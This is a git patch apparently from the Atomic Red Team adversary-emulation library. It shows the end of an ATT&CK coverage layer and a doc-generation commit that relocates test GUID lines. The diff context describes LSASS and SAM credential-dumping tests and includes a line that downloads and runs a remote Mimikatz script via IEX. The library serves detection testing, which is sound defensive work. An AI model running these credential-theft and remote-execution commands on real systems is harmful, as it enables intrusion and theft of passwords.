yco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":
100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","sc
ore":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003
","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techni
queID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574",
"score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score"
:100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}
\ No newline at end of file
From 36d49de4c8b00bf36054294b4a1fcbab3917d7c5 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Thu, 24 Jun 2021 17:04:33 +0000
Subject: [PATCH 68/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
atomics/T1003.001/T1003.001.md | 96 ++++++++++------- atomics/T1003.002/T1003.002.md | 32 +++--- atomics/T1003.003/T1003.003.md | 48 +++++---- atomics/T1003.004/T1003.004.md | 8 +- atomics/T1003.006/T1003.006.md | 8 +- atomics/T1003.007/T1003.007.md | 16 +-- atomics/T1003.008/T1003.008.md | 16 +-- atomics/T1003/T1003.md | 16 +-- atomics/T1006/T1006.md | 8 +- atomics/T1007/T1007.md | 16 +-- atomics/T1010/T1010.md | 8 +- atomics/T1012/T1012.md | 8 +- atomics/T1014/T1014.md | 24 +++-- atomics/T1016/T1016.md | 64 ++++++----- atomics/T1018/T1018.md | 88 +++++++++------ atomics/T1020/T1020.md | 8 +- atomics/T1021.001/T1021.001.md | 16 +-- atomics/T1021.002/T1021.002.md | 32 +++--- atomics/T1021.003/T1021.003.md | 8 +- atomics/T1021.006/T1021.006.md | 24 +++-- atomics/T1027.001/T1027.001.md | 8 +- atomics/T1027.002/T1027.002.md | 32 +++--- atomics/T1027.004/T1027.004.md | 16 +-- atomics/T1027/T1027.md | 48 +++++---- atomics/T1030/T1030.md | 8 +- atomics/T1033/T1033.md | 24 +++-- atomics/T1036.003/T1036.003.md | 72 ++++++++----- atomics/T1036.004/T1036.004.md | 16 +-- atomics/T1036.005/T1036.005.md | 8 +- atomics/T1036.006/T1036.006.md | 8 +- atomics/T1036/T1036.md | 8 +- atomics/T1037.001/T1037.001.md | 8 +- atomics/T1037.002/T1037.002.md | 8 +- atomics/T1037.004/T1037.004.md | 24 +++-- atomics/T1037.005/T1037.005.md | 8 +- atomics/T1040/T1040.md | 32 +++--- atomics/T1046/T1046.md | 32 +++--- atomics/T1047/T1047.md | 64 ++++++----- atomics/T1048.003/T1048.003.md | 40 ++++--- atomics/T1048/T1048.md | 16 +-- atomics/T1049/T1049.md | 32 +++--- atomics/T1053.001/T1053.001.md | 8 +- atomics/T1053.002/T1053.002.md | 8 +- atomics/T1053.003/T1053.003.md | 24 +++-- atomics/T1053.004/T1053.004.md | 8 +- atomics/T1053.005/T1053.005.md | 48 +++++---- atomics/T1053.006/T1053.006.md | 8 +-
atomics/T1053.007/T1053.007.md | 16 +-- atomics/T1055.001/T1055.001.md | 8 +- atomics/T1055.004/T1055.004.md | 8 +- atomics/T1055.012/T1055.012.md | 16 +-- atomics/T1055/T1055.md | 16 +-- atomics/T1056.001/T1056.001.md | 16 +-- atomics/T1056.002/T1056.002.md | 16 +-- atomics/T1056.004/T1056.004.md | 8 +- atomics/T1057/T1057.md | 16 +-- atomics/T1059.001/T1059.001.md | 144 +++++++++++++++---------- atomics/T1059.002/T1059.002.md | 8 +- atomics/T1059.003/T1059.003.md | 16 +-- atomics/T1059.004/T1059.004.md | 16 +-- atomics/T1059.005/T1059.005.md | 24 +++-- atomics/T1059.006/T1059.006.md | 24 +++-- atomics/T1069.001/T1069.001.md | 24 +++-- atomics/T1069.002/T1069.002.md | 64 ++++++----- atomics/T1070.001/T1070.001.md | 24 +++-- atomics/T1070.002/T1070.002.md | 24 +++-- atomics/T1070.003/T1070.003.md | 88 +++++++++------ atomics/T1070.004/T1070.004.md | 80 ++++++++------ atomics/T1070.005/T1070.005.md | 24 +++-- atomics/T1070.006/T1070.006.md | 64 ++++++----- atomics/T1070/T1070.md | 8 +- atomics/T1071.001/T1071.001.md | 24 +++-- atomics/T1071.004/T1071.004.md | 32 +++--- atomics/T1072/T1072.md | 8 +- atomics/T1074.001/T1074.001.md | 24 +++-- atomics/T1078.001/T1078.001.md | 8 +- atomics/T1078.003/T1078.003.md | 8 +- atomics/T1082/T1082.md | 88 +++++++++------ atomics/T1083/T1083.md | 32 +++--- atomics/T1087.001/T1087.001.md | 88 +++++++++------ atomics/T1087.002/T1087.002.md | 80 ++++++++------ atomics/T1090.001/T1090.001.md | 24 +++-- atomics/T1095/T1095.md | 24 +++-- atomics/T1098.004/T1098.004.md | 8 +- atomics/T1098/T1098.md | 16 +-- atomics/T1105/T1105.md | 112 +++++++++++-------- atomics/T1106/T1106.md | 8 +- atomics/T1110.001/T1110.001.md | 16 +-- atomics/T1110.002/T1110.002.md | 8 +- atomics/T1110.003/T1110.003.md | 24 +++-- atomics/T1110.004/T1110.004.md | 16 +-- atomics/T1112/T1112.md | 48 +++++---- atomics/T1113/T1113.md | 40 ++++--- atomics/T1114.001/T1114.001.md | 8 +- atomics/T1115/T1115.md | 32 +++--- atomics/T1119/T1119.md | 32 +++--- 
atomics/T1120/T1120.md | 8 +- atomics/T1123/T1123.md | 8 +- atomics/T1124/T1124.md | 16 +-- atomics/T1127.001/T1127.001.md | 16 +-- atomics/T1132.001/T1132.001.md | 8 +- atomics/T1133/T1133.md | 8 +- atomics/T1134.001/T1134.001.md | 16 +-- atomics/T1134.004/T1134.004.md | 40 ++++--- atomics/T1135/T1135.md | 48 +++++---- atomics/T1136.001/T1136.001.md | 48 +++++---- atomics/T1136.002/T1136.002.md | 24 +++-- atomics/T1137.002/T1137.002.md | 8 +- atomics/T1137.004/T1137.004.md | 8 +- atomics/T1137/T1137.md | 8 +- atomics/T1140/T1140.md | 16 +-- atomics/T1176/T1176.md | 32 +++--- atomics/T1197/T1197.md | 32 +++--- atomics/T1201/T1201.md | 56 ++++++---- atomics/T1202/T1202.md | 24 +++-- atomics/T1204.002/T1204.002.md | 64 ++++++----- atomics/T1207/T1207.md | 8 +- atomics/T1216.001/T1216.001.md | 8 +- atomics/T1216/T1216.md | 16 +-- atomics/T1217/T1217.md | 56 ++++++---- atomics/T1218.001/T1218.001.md | 56 ++++++---- atomics/T1218.002/T1218.002.md | 8 +- atomics/T1218.003/T1218.003.md | 16 +-- atomics/T1218.004/T1218.004.md | 64 ++++++----- atomics/T1218.005/T1218.005.md | 72 ++++++++----- atomics/T1218.007/T1218.007.md | 24 +++-- atomics/T1218.008/T1218.008.md | 8 +- atomics/T1218.009/T1218.009.md | 16 +-- atomics/T1218.010/T1218.010.md | 40 ++++--- atomics/T1218.011/T1218.011.md | 64 ++++++----- atomics/T1218/T1218.md | 64 ++++++----- atomics/T1219/T1219.md | 24 +++-- atomics/T1220/T1220.md | 32 +++--- atomics/T1221/T1221.md | 8 +- atomics/T1222.001/T1222.001.md | 40 ++++--- atomics/T1222.002/T1222.002.md | 72 ++++++++----- atomics/T1482/T1482.md | 40 ++++--- atomics/T1485/T1485.md | 16 +-- atomics/T1486/T1486.md | 32 +++--- atomics/T1489/T1489.md | 24 +++-- atomics/T1490/T1490.md | 56 ++++++---- atomics/T1491.001/T1491.001.md | 8 +- atomics/T1496/T1496.md | 8 +- atomics/T1497.001/T1497.001.md | 24 +++-- atomics/T1505.002/T1505.002.md | 8 +- atomics/T1505.003/T1505.003.md | 8 +- atomics/T1518.001/T1518.001.md | 48 +++++---- atomics/T1518/T1518.md | 24 +++-- 
atomics/T1529/T1529.md | 72 ++++++++----- atomics/T1531/T1531.md | 24 +++-- atomics/T1543.001/T1543.001.md | 8 +- atomics/T1543.002/T1543.002.md | 16 +-- atomics/T1543.003/T1543.003.md | 24 +++-- atomics/T1543.004/T1543.004.md | 8 +- atomics/T1546.001/T1546.001.md | 8 +- atomics/T1546.002/T1546.002.md | 8 +- atomics/T1546.003/T1546.003.md | 8 +- atomics/T1546.004/T1546.004.md | 16 +-- atomics/T1546.005/T1546.005.md | 8 +- atomics/T1546.007/T1546.007.md | 8 +- atomics/T1546.008/T1546.008.md | 16 +-- atomics/T1546.010/T1546.010.md | 8 +- atomics/T1546.011/T1546.011.md | 24 +++-- atomics/T1546.012/T1546.012.md | 16 +-- atomics/T1546.013/T1546.013.md | 8 +- atomics/T1546.014/T1546.014.md | 8 +- atomics/T1547.001/T1547.001.md | 56 ++++++---- atomics/T1547.004/T1547.004.md | 24 +++-- atomics/T1547.005/T1547.005.md | 8 +- atomics/T1547.006/T1547.006.md | 8 +- atomics/T1547.007/T1547.007.md | 16 +-- atomics/T1547.009/T1547.009.md | 16 +-- atomics/T1547.010/T1547.010.md | 8 +- atomics/T1547.011/T1547.011.md | 8 +- atomics/T1548.001/T1548.001.md | 24 +++-- atomics/T1548.002/T1548.002.md | 72 ++++++++----- atomics/T1548.003/T1548.003.md | 24 +++-- atomics/T1550.002/T1550.002.md | 16 +-- atomics/T1550.003/T1550.003.md | 8 +- atomics/T1552.001/T1552.001.md | 40 ++++--- atomics/T1552.002/T1552.002.md | 16 +-- atomics/T1552.003/T1552.003.md | 8 +- atomics/T1552.004/T1552.004.md | 32 +++--- atomics/T1552.006/T1552.006.md | 16 +-- atomics/T1552.007/T1552.007.md | 16 +-- atomics/T1553.001/T1553.001.md | 8 +- atomics/T1553.004/T1553.004.md | 40 ++++--- atomics/T1553.005/T1553.005.md | 16 +-- atomics/T1555.001/T1555.001.md | 8 +- atomics/T1555.003/T1555.003.md | 24 +++-- atomics/T1555/T1555.md | 24 +++-- atomics/T1556.002/T1556.002.md | 8 +- atomics/T1558.001/T1558.001.md | 8 +- atomics/T1558.003/T1558.003.md | 8 +- atomics/T1559.002/T1559.002.md | 24 +++-- atomics/T1560.001/T1560.001.md | 64 ++++++----- atomics/T1560.002/T1560.002.md | 32 +++--- atomics/T1560/T1560.md | 8 +- 
atomics/T1562.001/T1562.001.md | 192 ++++++++++++++++++++------------- atomics/T1562.002/T1562.002.md | 32 +++--- atomics/T1562.003/T1562.003.md | 16 +-- atomics/T1562.004/T1562.004.md | 56 ++++++---- atomics/T1562.006/T1562.006.md | 16 +-- atomics/T1563.002/T1563.002.md | 8 +- atomics/T1564.001/T1564.001.md | 56 ++++++---- atomics/T1564.002/T1564.002.md | 16 +-- atomics/T1564.003/T1564.003.md | 8 +- atomics/T1564.004/T1564.004.md | 32 +++--- atomics/T1564/T1564.md | 24 +++-- atomics/T1566.001/T1566.001.md | 16 +-- atomics/T1569.001/T1569.001.md | 8 +- atomics/T1569.002/T1569.002.md | 16 +-- atomics/T1571/T1571.md | 16 +-- atomics/T1573/T1573.md | 8 +- atomics/T1574.001/T1574.001.md | 8 +- atomics/T1574.002/T1574.002.md | 8 +- atomics/T1574.006/T1574.006.md | 16 +-- atomics/T1574.009/T1574.009.md | 8 +- atomics/T1574.011/T1574.011.md | 16 +-- atomics/T1574.012/T1574.012.md | 24 +++-- atomics/T1609/T1609.md | 8 +- atomics/T1610/T1610.md | 8 +- atomics/T1611/T1611.md | 8 +-
223 files changed, 3625 insertions(+), 2175 deletions(-)
diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md
index 9869cc02..024dd2aa 100644
--- a/atomics/T1003.001/T1003.001.md
+++ b/atomics/T1003.001/T1003.001.md
@@ -54,9 +54,6 @@ The following SSPs can be used to access credentials:
## Atomic Test #1 - Windows Credential Editor - -auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed - Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only) Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file.
@@ -64,9 +61,14 @@ Upon successful execution, you should see a file with user passwords/hashes at % If you see no output it is likely that execution was blocked by Anti-Virus. If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install Windows Credential Editor first. + **Supported Platforms:** Windows +**auto_generated_guid:** 0f7c5301-6859-45ba-8b4d-1fac30fc31ed + + + #### Inputs:
@@ -117,18 +119,20 @@ if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump - -auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. + **Supported Platforms:** Windows +**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 + + + #### Inputs:
@@ -174,15 +178,17 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
## Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll - -auto_generated_guid: 2536dee2-12fb-459a-8c37-971844fa73be - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp. + **Supported Platforms:** Windows +**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be + + +
@@ -206,18 +212,20 @@ Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
## Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking - -auto_generated_guid: 7ae7102c-a099-45c8-b985-4c7a2d05790d - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp. If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first. + **Supported Platforms:** Windows +**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d + + + #### Inputs:
@@ -260,14 +268,16 @@ Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c
## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager - -auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607 - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions. + **Supported Platforms:** Windows +**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607 + + + #### Run it with these steps!
@@ -292,14 +302,16 @@ Manager and administrative permissions.
## Atomic Test #6 - Offline Credential Theft With Mimikatz - -auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023 - The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands. + **Supported Platforms:** Windows +**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023 + + + #### Inputs:
@@ -358,17 +370,19 @@ Write-Host "Create the lsass dump manually using the steps in the previous test
## Atomic Test #7 - LSASS read with pypykatz - -auto_generated_guid: c37bc535-5c62-4195-9cc3-0517673171d8 - Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa:: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple useranames and passwords/hashes to the screen. + **Supported Platforms:** Windows +**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8 + + +
@@ -421,15 +435,17 @@ pip install pypykatz
## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1 - -auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781 - The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. + **Supported Platforms:** Windows +**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781 + + +
@@ -454,18 +470,20 @@ Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump - -auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. + **Supported Platforms:** Windows +**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b + + + #### Inputs:
@@ -510,16 +528,18 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
## Atomic Test #10 - Powershell Mimikatz - -auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc - Dumps credentials from memory via Powershell by invoking a remote mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes output to the screen. Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA" + **Supported Platforms:** Windows +**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc + + + #### Inputs:
@@ -544,14 +564,16 @@ IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimika
## Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe - -auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 - This test uses the technique describe in this tweet (https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass + **Supported Platforms:** Windows +**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 + + + #### Inputs:
@@ -597,17 +619,19 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec
## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs - -auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. + **Supported Platforms:** Windows +**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697 + + + #### Inputs:
diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md
index 73f20f13..ad162a55 100644
--- a/atomics/T1003.002/T1003.002.md
+++ b/atomics/T1003.002/T1003.002.md
@@ -36,16 +36,18 @@ Notes:
## Atomic Test #1 - Registry dump of SAM, creds, and secrets - -auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44 - Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory. + **Supported Platforms:** Windows +**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44 + + +
@@ -73,13 +75,15 @@ del %temp%\security >nul 2> nul
